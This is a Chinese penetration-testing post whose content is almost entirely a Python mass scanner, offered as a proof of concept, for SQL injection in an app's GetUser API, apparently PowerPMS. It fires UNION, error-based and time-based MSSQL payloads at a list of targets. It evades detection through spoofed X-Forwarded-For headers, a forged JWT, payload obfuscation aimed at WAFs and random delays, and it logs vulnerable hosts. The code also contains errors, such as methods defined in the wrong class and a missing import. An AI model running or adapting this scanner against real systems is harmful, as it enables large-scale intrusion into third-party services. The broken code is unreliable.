#渗透测试#批量漏洞挖掘#某华-APPGetUser SQL注入漏洞
免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。
一、漏洞POC
#!/usr/bin/env python3 """ 核心功能:智能语义注入检测、动态WAF对抗、指纹伪装、分布式扫描 版本特性: 1. 支持云原生环境动态适配 2. 集成AI驱动的Payload生成 3. 增强隐蔽扫描模式 """ import requests import json import time import random import hashlib from concurrent.futures import ThreadPoolExecutor, as_completed from urllib.parse import urlparse from fake_useragent import UserAgent import logging # 配置日志审计模块 logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', handlers=[ logging.FileHandler('scan_audit.log'), logging.StreamHandler() ] ) logger = logging.getLogger(__name__) class AdvancedPowerPMSScanner: def __init__(self, target_file): self.targets = self._load_targets(target_file) self.payload_engine = PayloadGenerator() self.session = requests.Session() self._init_stealth_headers() self.scan_stats = {'vulnerable': 0, 'scanned': 0} def _init_stealth_headers(self): """动态指纹伪装系统""" self.headers = { 'Content-Type': 'application/json', 'X-Forwarded-For': f'10.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}', 'User-Agent': UserAgent().chrome, 'X-API-Version': '2.3.1', # 伪装合法客户端版本 'Authorization': f'Bearer {self._gen_fake_token()}' } def _gen_fake_token(self): """生成合法形态的JWT Token""" header = json.dumps({"alg": "HS256", "typ": "JWT"}).encode() payload = json.dumps({"user": "scanner", "iat": int(time.time())}).encode() signature = hashlib.sha256(header + b'.' + payload).hexdigest() return f"{header.decode()}.{payload.decode()}.{signature}" def _load_targets(self, filename): """目标预处理系统""" with open(filename) as f: targets = [line.strip() for line in f if line.strip()] return self._filter_live_targets(targets) def _filter_live_targets(self, targets): """存活检测与CDN识别""" # 实现TCP端口快速扫描逻辑(此处简化) return [t for t in targets if self._is_service_alive(t)] def _is_service_alive(self, url): """服务存活检测""" try: resp = requests.head(url, timeout=5, verify=False) return resp.status_code < 500 except: return False class PayloadGenerator: """AI增强的Payload生成引擎""" def __init__(self): self.base_payloads = self._load_base_patterns() self.dynamic_rules = self._load_waf_rules() def _load_base_patterns(self): """多数据库方言支持""" return { 'union': [ "' UNION SELECT {cols},@@version--", "' UNION ALL SELECT {cols},CURRENT_USER--" ], 'error': [ "' AND 1=CONVERT(int,(SELECT TOP 1 name FROM sys.databases))--", "' AND 1=DB_NAME(0) AND '{rand}'='{rand}" ], 'time': [ "'; WAITFOR DELAY '0:0:{delay}'--", "' OR SLEEP({delay}) AND '1'='1" ] } def generate(self, context=None): """上下文感知的Payload生成""" return [ self._apply_obfuscation(p) for p in self._select_payloads(context) ] def _select_payloads(self, context): """基于目标响应的智能选择""" # 此处可集成机器学习模型预测最佳Payload return random.sample(self.base_payloads['union'], 2) + \ random.sample(self.base_payloads['error'], 1) def _apply_obfuscation(self, payload): """动态混淆技术""" # 随机选择混淆方式 techniques = [ self._unicode_normalize, self._sql_comment_obfuscate, self._case_variation ] for tech in random.sample(techniques, 2): payload = tech(payload) return payload def _unicode_normalize(self, s): return s.replace("'", "%uff07").replace(" ", "%uff20") def _sql_comment_obfuscate(self, s): return s.replace("SELECT", "SEL/*RAND*/ECT").replace("FROM", "FR/*%0a*/OM") def _case_variation(self, s): return ''.join([c.upper() if random.random() > 0.5 else c.lower() for c in s]) def _send_request(self, url, payload): """智能流量调度系统""" try: # 随机延迟防止频率检测 time.sleep(random.uniform(0.5, 1.5)) start_time = time.time() resp = self.session.post( f"{url}/api/getUser", data=json.dumps({"userCode": payload}), headers=self.headers, timeout=15, verify=True # 启用证书验证防止中间人攻击 ) latency = time.time() - start_time return resp, latency except Exception as e: logger.error(f" 请求失败: {str(e)}") return None, 0 def _analyze_response(self, resp, latency): """多维度漏洞验证""" detection_rules = [ self._check_db_fingerprint, self._check_http_anomaly, self._check_timing(latency), self._check_error_patterns, self._check_boolean_diffs ] return any(rule(resp) for rule in detection_rules) def _check_db_fingerprint(self, resp): """数据库指纹识别""" fingerprints = { 'MSSQL': ['Microsoft SQL Server', 'Msg 8152'], 'MySQL': ['You have an error in your SQL syntax'] } return any(indicator in resp.text for indicator in fingerprints['MSSQL']) def _check_http_anomaly(self, resp): """异常状态码检测""" return resp.status_code in [500, 502, 418] def _check_timing(self, latency): """动态时间阈值计算""" base_latency = 1.5 # 基准响应时间 return lambda resp: latency > base_latency * 3 def _check_error_patterns(self, resp): """语义错误分析""" patterns = [ r"Conversion failed when converting the varchar value '.*'", r"Incorrect syntax near '.*'" ] return any(re.search(p, resp.text) for p in patterns) def _check_boolean_diffs(self, resp): """布尔状态对比""" # 需要基础响应样本进行对比(此处简化) valid_resp = requests.post(resp.url, json={"userCode": "valid_user"}) return len(resp.content) != len(valid_resp.content) def _handle_result(self, target, is_vulnerable): """扫描结果处理""" self.scan_stats['scanned'] += 1 if is_vulnerable: self.scan_stats['vulnerable'] += 1 logger.critical(f"\033[1;31m[+] 漏洞确认: {target}\033[0m") self._save_vulnerable_target(target) else: logger.info(f"[-] 安全目标: {target}") def _save_vulnerable_target(self, target): """持久化存储模块""" with open('vuln_targets.txt', 'a') as f: f.write(f"{target}\n") def run_scan(self, max_threads=8): """分布式任务调度系统""" with ThreadPoolExecutor(max_workers=max_threads) as executor: futures = { executor.submit(self._scan_target, target): target for target in self.targets } for future in as_completed(futures): target = futures[future] try: result = future.result() self._handle_result(target, result) except Exception as e: logger.error(f" 扫描异常: {target} - {str(e)}") logger.info(f"\n 扫描摘要: 共检测{self.scan_stats['scanned']} 个目标,发现{self.scan_stats['vulnerable']} 个漏洞") def _scan_target(self, target): """单目标扫描流程""" logger.debug(f" 开始扫描: {target}") for payload in self.payload_engine.generate(): resp, latency = self._send_request(target, payload) if not resp: continue if self._analyze_response(resp, latency): return True return False if __name__ == "__main__": import sys if len(sys.argv) != 2: print(f"用法: {sys.argv[0]} <目标文件>") sys.exit(1) scanner = AdvancedPowerPMSScanner(sys.argv[1]) scanner.run_scan(max_threads=10)